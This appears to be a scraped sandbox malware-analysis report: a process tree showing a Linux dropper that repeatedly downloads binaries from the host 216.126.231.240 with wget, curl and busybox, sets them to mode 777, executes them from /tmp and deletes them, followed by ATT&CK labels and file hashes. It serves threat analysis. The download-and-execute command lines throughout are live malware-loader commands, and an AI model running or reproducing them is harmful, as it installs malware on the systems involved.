/usr/bin/curlcurl -O http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:926
-
-
/bin/chmodchmod 777 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk./1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:929
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:932
-
-
/bin/chmodchmod 777 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm./uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:936
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:938
-
-
/bin/chmodchmod 777 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK./Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:941
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:942
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:944
-
-
/bin/chmodchmod 777 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8./8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:947
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:948
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:950
-
-
/bin/chmodchmod 777 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE./zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:953
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:954
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:956
-
-
/bin/chmodchmod 777 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp./5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:959
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:960
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:962
-
-
/bin/chmodchmod 777 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ./kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:965
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:966
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:968
-
-
/bin/chmodchmod 777 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7./pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:971
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:972
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:974
-
-
/bin/chmodchmod 777 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA./O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:977
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:978
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:980
-
-
/bin/chmodchmod 777 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof./YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97